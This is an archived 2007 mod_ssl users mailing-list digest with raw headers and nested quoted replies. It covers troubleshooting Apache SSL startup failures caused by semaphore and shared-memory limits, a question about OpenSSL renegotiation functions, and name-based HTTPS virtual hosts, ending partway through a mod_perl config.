> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr  2 12:29:54 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0A9D314D873; Mon,  2 Apr 2007 12:29:54 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sun.pyrenet (ohp.adsl.pyrenet.fr [62.212.125.145])
	by master.modssl.org (Postfix) with ESMTP id F0B0614D841
	for ; Mon,  2 Apr 2007 12:29:50 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by sun.pyrenet (Postfix) with ESMTP id 034C11294C
	for ; Mon,  2 Apr 2007 12:29:12 +0200 (CEST)
X-Virus-Scanned: amavisd-new at pyrenet.fr
Received: from sun.pyrenet ([127.0.0.1])
	by localhost (sun.pyrenet [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id 9vTQHD0HeGM6 for ;
	Mon,  2 Apr 2007 12:29:11 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by sun.pyrenet (Postfix) with ESMTP id E659012878
	for ; Mon,  2 Apr 2007 12:29:10 +0200 (CEST)
Date: Mon, 2 Apr 2007 12:29:10 +0200 (CEST)
From: ohp@pyrenet.fr
X-X-Sender: ohp@sun.pyrenet
To: modssl-users@modssl.org
Subject: Re: Apache wont start with ssl
In-Reply-To: <460F1450.4050304@uen.org>
Message-ID: 
References: <000601c78c27$d2da8d20$2200a8c0@zeus> <460F1450.4050304@uen.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: ohp@pyrenet.fr
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I'd rather think your SHMMAX is too low.
If on Linux, check /proc/kernel/shmmax (IIRC) and up it.
Hope it helps!
On Sat, 31 Mar 2007, Andy Cravens wrote:

> Date: Sat, 31 Mar 2007 20:09:20 -0600
> From: Andy Cravens 
> Reply-To: modssl-users@modssl.org
> To: modssl-users@modssl.org
> Subject: Re: Apache wont start with ssl
>
> Judging from the error message "No space left on device" sounds like
> some file system is full... maybe /tmp.  The next time this happens open
> a shell window and type:
>
> df -k
>
> Check the output to see if one of your file systems is full.  Look at
> /tmp and /swap specifically
>
>
>
> Ryan Forrester wrote:
> > When attempting to start apache in SSL mode:
> > $ /home/servers/apache_1.3.37/bin/apachectl startssl
> > $ semget: No space left on device
> >
> > Rebooting the machine allows me to start apache once more.. but after a few
> > days, apache wil fail and the same error occurs again, and the only way to
> > resolve is to reboot.
> > - Apache will start in mornal mode without a reboot.
> >
> > error_log doesnt contain any useful information to help troubleshoot the
> >
> > problem.
> >
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

-- 
Olivier PRENANT        	        Tel: +33-5-61-50-97-00 (Work)
15, Chemin des Monges                +33-5-61-50-97-01 (Fax)
31190 AUTERIVE                       +33-6-07-63-80-64 (GSM)
FRANCE                          Email: ohp@pyrenet.fr
------------------------------------------------------------------------------
Make your life a dream, make your dream a reality. (St Exupery)
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr  2 15:14:07 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 16D0C14D88F; Mon,  2 Apr 2007 15:14:07 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail1.uen.org (mailgate.uen.org [205.127.225.225])
	by master.modssl.org (Postfix) with ESMTP id 555D414D841
	for ; Mon,  2 Apr 2007 15:14:05 +0200 (CEST)
Received: from mail1.uen.org (localhost.localdomain [127.0.0.1])
	by mail1.uen.org (Postfix) with SMTP id C7DABD41FA
	for ; Mon,  2 Apr 2007 07:13:28 -0600 (MDT)
Received: by mail1.uen.org (Postfix, from userid 501)
	id 9134FD4214; Mon,  2 Apr 2007 07:13:28 -0600 (MDT)
X-Spam-Checker-Version: SpamAssassin 3.1.8 (2007-02-13) on mail1.uen.org
X-Spam-Level: 
X-Spam-Status: No, score=-101.8 required=3.5 tests=AWL,BAYES_00,
	USER_IN_WHITELIST autolearn=ham version=3.1.8
Received: from underminer1.uen.org (underminer1.uen.org [205.127.226.249])
	by mail1.uen.org (Postfix) with ESMTP id C9C2CD41FA
	for ; Mon,  2 Apr 2007 07:13:23 -0600 (MDT)
Received: from [192.168.1.100] (c-24-10-198-153.hsd1.ut.comcast.net [24.10.198.153])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by underminer1.uen.org (Postfix) with ESMTP id 604A412A06B
	for ; Mon,  2 Apr 2007 07:13:23 -0600 (MDT)
Message-ID: <4611016C.9020201@uen.org>
Date: Mon, 02 Apr 2007 07:13:16 -0600
From: Andy Cravens 
User-Agent: Thunderbird 1.5.0.10 (Windows/20070221)
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: Apache wont start with ssl
References: <000101c78ca2$013aa680$2200a8c0@zeus>
In-Reply-To: <000101c78ca2$013aa680$2200a8c0@zeus>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Anti-Virus: Kaspersky Anti-Virus for MailServers 5.5.2/RELEASE, bases: 02042007 #273426, status: clean
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Andy Cravens 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Also run:

df -i

to see if you're out of inodes on any file system.



Ryan Forrester wrote:
> Mqueue dir had only 5mb files in it.
>
> [root@server15 ~]# df -h
> Filesystem            Size  Used Avail Use% Mounted on
> /dev/mapper/VolGroup00-LogVol00
>                        15G  5.0G  8.8G  36% /
> /dev/ida/c0d0p1        99M   16M   78M  17% /boot
> tmpfs                 569M     0  569M   0% /dev/shm
>
>
>
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of Dave Paris
> Sent: Sunday, April 01, 2007 3:10 PM
> To: modssl-users@modssl.org
> Subject: Re: Apache wont start with ssl
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Occasionally, /var/spool/clientmqueue can bite you as well.  The
> filesystem will not show 100% used but you'll be out of inodes.  (If
> that happens, you'll have loads of fun clearing it out ;-)
>
> Good Luck!
> - -dsp
>
>
>
>
> Andy Cravens wrote:
>   
>> Judging from the error message "No space left on device" sounds like
>> some file system is full... maybe /tmp.  The next time this happens
>>     
> open
>   
>> a shell window and type:
>>
>> df -k
>>
>> Check the output to see if one of your file systems is full.  Look at
>> /tmp and /swap specifically
>>
>>
>>
>> Ryan Forrester wrote:
>>     
>>> When attempting to start apache in SSL mode:
>>> $ /home/servers/apache_1.3.37/bin/apachectl startssl
>>> $ semget: No space left on device
>>>  
>>> Rebooting the machine allows me to start apache once more.. but after
>>> a few days, apache wil fail and the same error occurs again, and the
>>> only way to resolve is to reboot.
>>> - Apache will start in mornal mode without a reboot.
>>>  
>>> error_log doesnt contain any useful information to help troubleshoot
>>>       
> the
>   
>>> problem.
>>>
>>>       
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>>     
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.1 (Darwin)
>
> iD8DBQFGDz62KmNPF3QynfQRAgjmAJ0XOdj2FH9O8oPRk9wD+IEEGgQHIwCfZmjc
> +urX+xVcjjO+b/XjbsSfz6c=
> =cMPQ
> -----END PGP SIGNATURE-----
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>   


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr  4 07:41:25 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A1E4D14D895; Wed,  4 Apr 2007 07:41:25 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from m12-12.163.com (m12-12.163.com [220.181.12.12])
	by master.modssl.org (Postfix) with SMTP id 2713714D83E
	for ; Wed,  4 Apr 2007 07:41:23 +0200 (CEST)
Received: from shenzhen (unknown [203.110.163.232])
	by smtp13 (Coremail) with SMTP id wKjADLArJQYoOhNG2dVjFw==.57912S2;
	Wed, 04 Apr 2007 13:39:55 +0800 (CST)
From: "Zhaohui Zheng" 
To: 
Subject: ssl renegotiation
Date: Wed, 4 Apr 2007 13:39:46 +0800
Message-ID: <000401c7767b$a9a64690$a53fa8c0@shenzhen>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0005_01C776BE.B7C98690"
X-Mailer: Microsoft Office Outlook 11
Thread-Index: Acd2e6dq3dia/y+pRXqmgrwfhOUKPw==
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.3028
X-Coremail-Antispam: 1U3Yxn0WfASr-VFAUDIcSsGvfJTRUUUjevI42IY6I8E87Iv67
	AKxVWUJVW8JwCI42IY6xIIjxv20xvE14v26r1j6r1xMxCjnVAqn7xvrwCI42IY6xIIjxv2
	0xvEc7CjxVAFwI0_Jr0_Gr1lYx0Ex4A2jsIE14v26r1j6r4UMIIF0xvEx4A2jsIEc7CjxV
	AFwI0_Jr0_Gr1lc2xSY4AK67AK6r4rM7AC8VAFwI0_Jr0_Gr1lYx0E2Ix0cI8IcVAFwI0_
	JrI_Jryl7I0Y6sxI4wAYFVCjjxCrM7CIcVAFz4kK6r1j6r18Mc02F40E57IF67AEF4xIwI
	1l5I8CrVAYj202j2C_Xr0_Wr1l5I8CrVAKz4kIr2xC04v26r4j6ryUMc02F40E42I26xC2
	a48xM7k0a2IF6r1xn29KB7ZKAUJUUUUUnxnvy29KBjDU0xZFpf9x0z_cTm5UUUUU129KBj
	DU=
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Zhaohui Zheng" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0005_01C776BE.B7C98690
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

Hi,

 

Just wondering if anybody in the mail list ever tried
BIO_set_ssl_renegotiate_timeout or BIO_set_ssl_renegotiate_bytes. Can
anybody shed some light on how to use those functions?

 

Thanks ahead.

Zhaohui


------=_NextPart_000_0005_01C776BE.B7C98690
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
















Hi,



 



Just wondering if anybody in the mail list ever =
tried BIO_set_ssl_renegotiate_timeout
or BIO_set_ssl_renegotiate_bytes. Can anybody shed some light on how to =
use those
functions?



 



Thanks ahead.



Zhaohui









------=_NextPart_000_0005_01C776BE.B7C98690--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr  5 01:21:04 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3F3BE14D856; Thu,  5 Apr 2007 01:21:04 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.deluxnetwork.com (mail.deluxnetwork.com [203.206.139.222])
	by master.modssl.org (Postfix) with ESMTP id 3D87014D82F
	for ; Thu,  5 Apr 2007 01:20:57 +0200 (CEST)
Received: from zeus (unknown [192.168.0.31])
	by mail.deluxnetwork.com (Postfix) with ESMTP id 8C9436C6560
	for ; Thu,  5 Apr 2007 00:46:48 +1000 (EST)
From: "Ryan Forrester" 
To: 
Subject: RE: Apache wont start with ssl
Date: Sun, 6 May 2007 09:19:53 +1000
Message-ID: <000b01c78f6b$e3d26e80$1f00a8c0@zeus>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2616
In-Reply-To: <4611016C.9020201@uen.org>
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ryan Forrester" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

[root@server15 ~]# df -i
Filesystem            Inodes   IUsed   IFree IUse% Mounted on
/dev/mapper/VolGroup00-LogVol00
                     3899392  146055 3753337    4% /
/dev/ida/c0d0p1        26104      38   26066    1% /boot
tmpfs                 145583       1  145582    1% /dev/shm
[root@server15 ~]#



-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Andy Cravens
Sent: Monday, April 02, 2007 11:13 PM
To: modssl-users@modssl.org
Subject: Re: Apache wont start with ssl

Also run:

df -i

to see if you're out of inodes on any file system.



Ryan Forrester wrote:
> Mqueue dir had only 5mb files in it.
>
> [root@server15 ~]# df -h
> Filesystem            Size  Used Avail Use% Mounted on
> /dev/mapper/VolGroup00-LogVol00
>                        15G  5.0G  8.8G  36% /
> /dev/ida/c0d0p1        99M   16M   78M  17% /boot
> tmpfs                 569M     0  569M   0% /dev/shm
>
>
>
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of Dave Paris
> Sent: Sunday, April 01, 2007 3:10 PM
> To: modssl-users@modssl.org
> Subject: Re: Apache wont start with ssl
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Occasionally, /var/spool/clientmqueue can bite you as well.  The
> filesystem will not show 100% used but you'll be out of inodes.  (If
> that happens, you'll have loads of fun clearing it out ;-)
>
> Good Luck!
> - -dsp
>
>
>
>
> Andy Cravens wrote:
>   
>> Judging from the error message "No space left on device" sounds like
>> some file system is full... maybe /tmp.  The next time this happens
>>     
> open
>   
>> a shell window and type:
>>
>> df -k
>>
>> Check the output to see if one of your file systems is full.  Look at
>> /tmp and /swap specifically
>>
>>
>>
>> Ryan Forrester wrote:
>>     
>>> When attempting to start apache in SSL mode:
>>> $ /home/servers/apache_1.3.37/bin/apachectl startssl
>>> $ semget: No space left on device
>>>  
>>> Rebooting the machine allows me to start apache once more.. but
after
>>> a few days, apache wil fail and the same error occurs again, and the
>>> only way to resolve is to reboot.
>>> - Apache will start in mornal mode without a reboot.
>>>  
>>> error_log doesnt contain any useful information to help troubleshoot
>>>       
> the
>   
>>> problem.
>>>
>>>       
>>
______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)
www.modssl.org
>> User Support Mailing List
modssl-users@modssl.org
>> Automated List Manager
majordomo@modssl.org
>>     
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.1 (Darwin)
>
> iD8DBQFGDz62KmNPF3QynfQRAgjmAJ0XOdj2FH9O8oPRk9wD+IEEGgQHIwCfZmjc
> +urX+xVcjjO+b/XjbsSfz6c=
> =cMPQ
> -----END PGP SIGNATURE-----
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>   


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr  5 01:21:45 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C3F8E14D88F; Thu,  5 Apr 2007 01:21:44 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.deluxnetwork.com (mail.deluxnetwork.com [203.206.139.222])
	by master.modssl.org (Postfix) with ESMTP id 0EE1114D9E4
	for ; Thu,  5 Apr 2007 01:21:41 +0200 (CEST)
Received: from zeus (unknown [192.168.0.31])
	by mail.deluxnetwork.com (Postfix) with ESMTP id CC8CB6C6560
	for ; Thu,  5 Apr 2007 00:47:33 +1000 (EST)
From: "Ryan Forrester" 
To: 
Subject: RE: Apache wont start with ssl
Date: Sun, 6 May 2007 09:20:38 +1000
Message-ID: <000c01c78f6b$fe241a40$1f00a8c0@zeus>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2616
In-Reply-To: 
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ryan Forrester" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Nothing exists here.

[root@server15 ~]# ll /proc/kernel/shmmax
ls: /proc/kernel/shmmax: No such file or directory
[root@server15 ~]


-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of ohp@pyrenet.fr
Sent: Monday, April 02, 2007 8:29 PM
To: modssl-users@modssl.org
Subject: Re: Apache wont start with ssl

I'd rather think your SHMMAX is too low.
If on Linux, check /proc/kernel/shmmax (IIRC) and up it.
Hope it helps!
On Sat, 31 Mar 2007, Andy Cravens wrote:

> Date: Sat, 31 Mar 2007 20:09:20 -0600
> From: Andy Cravens 
> Reply-To: modssl-users@modssl.org
> To: modssl-users@modssl.org
> Subject: Re: Apache wont start with ssl
>
> Judging from the error message "No space left on device" sounds like
> some file system is full... maybe /tmp.  The next time this happens
open
> a shell window and type:
>
> df -k
>
> Check the output to see if one of your file systems is full.  Look at
> /tmp and /swap specifically
>
>
>
> Ryan Forrester wrote:
> > When attempting to start apache in SSL mode:
> > $ /home/servers/apache_1.3.37/bin/apachectl startssl
> > $ semget: No space left on device
> >
> > Rebooting the machine allows me to start apache once more.. but
after a few
> > days, apache wil fail and the same error occurs again, and the only
way to
> > resolve is to reboot.
> > - Apache will start in mornal mode without a reboot.
> >
> > error_log doesnt contain any useful information to help troubleshoot
the
> >
> > problem.
> >
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

-- 
Olivier PRENANT        	        Tel: +33-5-61-50-97-00 (Work)
15, Chemin des Monges                +33-5-61-50-97-01 (Fax)
31190 AUTERIVE                       +33-6-07-63-80-64 (GSM)
FRANCE                          Email: ohp@pyrenet.fr
------------------------------------------------------------------------
------
Make your life a dream, make your dream a reality. (St Exupery)
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr  5 11:41:58 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C5E0E14D88B; Thu,  5 Apr 2007 11:41:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sun.pyrenet (ohp.adsl.pyrenet.fr [62.212.125.145])
	by master.modssl.org (Postfix) with ESMTP id 51B8714D82F
	for ; Thu,  5 Apr 2007 11:41:57 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by sun.pyrenet (Postfix) with ESMTP id 89B62C0AB
	for ; Thu,  5 Apr 2007 11:41:20 +0200 (CEST)
X-Virus-Scanned: amavisd-new at pyrenet.fr
Received: from sun.pyrenet ([127.0.0.1])
	by localhost (sun.pyrenet [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id LqfzmDVXw7-T for ;
	Thu,  5 Apr 2007 11:41:19 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by sun.pyrenet (Postfix) with ESMTP id 3E06F13FF2
	for ; Thu,  5 Apr 2007 11:41:19 +0200 (CEST)
Date: Thu, 5 Apr 2007 11:41:19 +0200 (CEST)
From: ohp@pyrenet.fr
X-X-Sender: ohp@sun.pyrenet
To: modssl-users@modssl.org
Subject: RE: Apache wont start with ssl
In-Reply-To: <000c01c78f6b$fe241a40$1f00a8c0@zeus>
Message-ID: 
References: <000c01c78f6b$fe241a40$1f00a8c0@zeus>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: ohp@pyrenet.fr
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Sorry,
I meant values in /proc/sys/kernel/shmmax, /proc/sys/kernel/shmall
/proc/sys/kernel/sem

I'm quite sure one of those values is too small.

Hope it helps
On Sun, 6 May 2007, Ryan Forrester wrote:

> Date: Sun, 6 May 2007 09:20:38 +1000
> From: Ryan Forrester 
> Reply-To: modssl-users@modssl.org
> To: modssl-users@modssl.org
> Subject: RE: Apache wont start with ssl
>
> Nothing exists here.
>
> [root@server15 ~]# ll /proc/kernel/shmmax
> ls: /proc/kernel/shmmax: No such file or directory
> [root@server15 ~]
>
>
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of ohp@pyrenet.fr
> Sent: Monday, April 02, 2007 8:29 PM
> To: modssl-users@modssl.org
> Subject: Re: Apache wont start with ssl
>
> I'd rather think your SHMMAX is too low.
> If on Linux, check /proc/kernel/shmmax (IIRC) and up it.
> Hope it helps!
> On Sat, 31 Mar 2007, Andy Cravens wrote:
>
> > Date: Sat, 31 Mar 2007 20:09:20 -0600
> > From: Andy Cravens 
> > Reply-To: modssl-users@modssl.org
> > To: modssl-users@modssl.org
> > Subject: Re: Apache wont start with ssl
> >
> > Judging from the error message "No space left on device" sounds like
> > some file system is full... maybe /tmp.  The next time this happens
> open
> > a shell window and type:
> >
> > df -k
> >
> > Check the output to see if one of your file systems is full.  Look at
> > /tmp and /swap specifically
> >
> >
> >
> > Ryan Forrester wrote:
> > > When attempting to start apache in SSL mode:
> > > $ /home/servers/apache_1.3.37/bin/apachectl startssl
> > > $ semget: No space left on device
> > >
> > > Rebooting the machine allows me to start apache once more.. but
> after a few
> > > days, apache wil fail and the same error occurs again, and the only
> way to
> > > resolve is to reboot.
> > > - Apache will start in mornal mode without a reboot.
> > >
> > > error_log doesnt contain any useful information to help troubleshoot
> the
> > >
> > > problem.
> > >
> >
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
>
>

-- 
Olivier PRENANT        	        Tel: +33-5-61-50-97-00 (Work)
15, Chemin des Monges                +33-5-61-50-97-01 (Fax)
31190 AUTERIVE                       +33-6-07-63-80-64 (GSM)
FRANCE                          Email: ohp@pyrenet.fr
------------------------------------------------------------------------------
Make your life a dream, make your dream a reality. (St Exupery)
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr  6 07:48:15 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 16EB214D88B; Fri,  6 Apr 2007 07:48:15 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from station174.com (station174.com [203.194.240.137])
	by master.modssl.org (Postfix) with ESMTP id BED4B14D82F
	for ; Fri,  6 Apr 2007 07:48:12 +0200 (CEST)
Received: (qmail 16348 invoked by uid 503); 6 Apr 2007 05:47:32 -0000
Received: from unknown (HELO sall) (124.243.156.220)
  by station174.com with SMTP; 6 Apr 2007 05:47:32 -0000
From: "Michael" 
To: 
Subject: HTTPS virtualhosts
Date: Fri, 6 Apr 2007 15:47:24 +1000
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook, Build 11.0.5510
Thread-Index: Acd4Dwzl07pHYOutQfmWxxbSZHZ9Ng==
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.3028
Message-Id: <20070406054813.BED4B14D82F@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Michael" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi everyone,

For starters, I'm not sure if I should be posting here or to Apache, but
they sort of steered me here, so I thought I'd start here at least -- if
not, please let me know. :-)

Anyway, I'm having issues with getting SSL and virtualhosts working with
Apache. Now, before you point me at the FAQ, it's not the obvious question.
What I'm trying to do is get multiple HTTPS hosts working on the same IP --
but using a wildcard SSL certificate.

My config is doing using mod_perl configuration, and I've copied it below.
Essentially, the idea is that I have a directory tree that looks like
/srv/www///[content|secure_content]// . That
way, I can just make a new directory/subdomain/etc., reload the apache
config, and it's all done and listening for me. And, since you can only have
one SSL cert per IP, I just have /srv/www//server.crt and server.key --
and that's the certificate used for that IP (so any HTTPS vhost created for
that IP will use that certificate). You may think that's a bit weird, but
there's a few circumstances that I want to use that - for example, wildcard
certificates I can have many vhosts per IP (within the same domain), and
also other times when I don't care if it cert mismatches, I just want an SSL
connection.

Anyway, the HTTP stuff is working great, and the config *appears* to check
out OK: 

[ root@bob:~ ] # apache2 -S
VirtualHost configuration:
1.2.3.4:80     is a NameVirtualHost
 default server www.non.existant.host.com
(/etc/apache2/sites-enabled/allsites-1-custom:5)
 port 80 namevhost www.non.existant.host.com
(/etc/apache2/sites-enabled/allsites-1-custom:5)
 port 80 namevhost sallaway.org (mod_perl:121)
 port 80 namevhost www.sallaway.org (mod_perl:177)
1.2.3.4:443    is a NameVirtualHost
 default server www.non.existant.host.com
(/etc/apache2/sites-enabled/allsites-1-custom:8)
 port 443 namevhost www.non.existant.host.com
(/etc/apache2/sites-enabled/allsites-1-custom:8)
 port 443 namevhost sallaway.org (mod_perl:1)
 port 443 namevhost www.sallaway.org (mod_perl:78)
Syntax OK


.... however when I try to reload the config file, it complains and whinges
a lot about SSL conflicts (error.log):

[warn] Init: SSL server IP/port conflict: bob.sallaway.org:443 (mod_perl:12)
vs. www.sallaway.org:443 (mod_perl:78)
[warn] Init: SSL server IP/port conflict: sallaway.org:443 (mod_perl:1) vs.
www.sallaway.org:443 (mod_perl:78)
[warn] Init: You should not use name-based virtual hosts in conjunction with
SSL!!


I was sort of hoping "hmmm, they're just warnings, maybe it will be OK", but
it appears not -- when I load the page, it gives me a "Connection
Interrupted" or "Action Cancelled" (pick your browser) and I get this in the
error.log:

[error] [client 192.168.0.4] Invalid method in request \x80L\x01\x03


Does anyone have any ideas what I can do to fix it at all, or why it's
happening?

Thanks for your help.

Cheers,
Michael


relevant apache config:


NameVirtualHost 1.2.3.4:80
NameVirtualHost 1.2.3.4:443


  ServerName www.non.existant.host.com


  ServerName www.non.existant.host.com



  my $www_path = "/srv/www";
  my @ip_array;
  my $ip_number;
  my @subdomain_array;
  my $subdomain_name;
  my $subdomain_address;
  my $domain_name;

  for $ip (<$www_path/*>) {

    @ip_array = split /\//, "$ip";
    $ip_number = $ip_array[-1];

    for $domain (<$ip/*>) {

      for $http_subdomain (<$domain/content/*>) {

        @subdomain_array = split /\//, "$http_subdomain";
        $subdomain_name = $subdomain_array[-1];
        $subdomain_address = $subdomain_name . ".";
        $domain_name = $subdomain_array[-3];

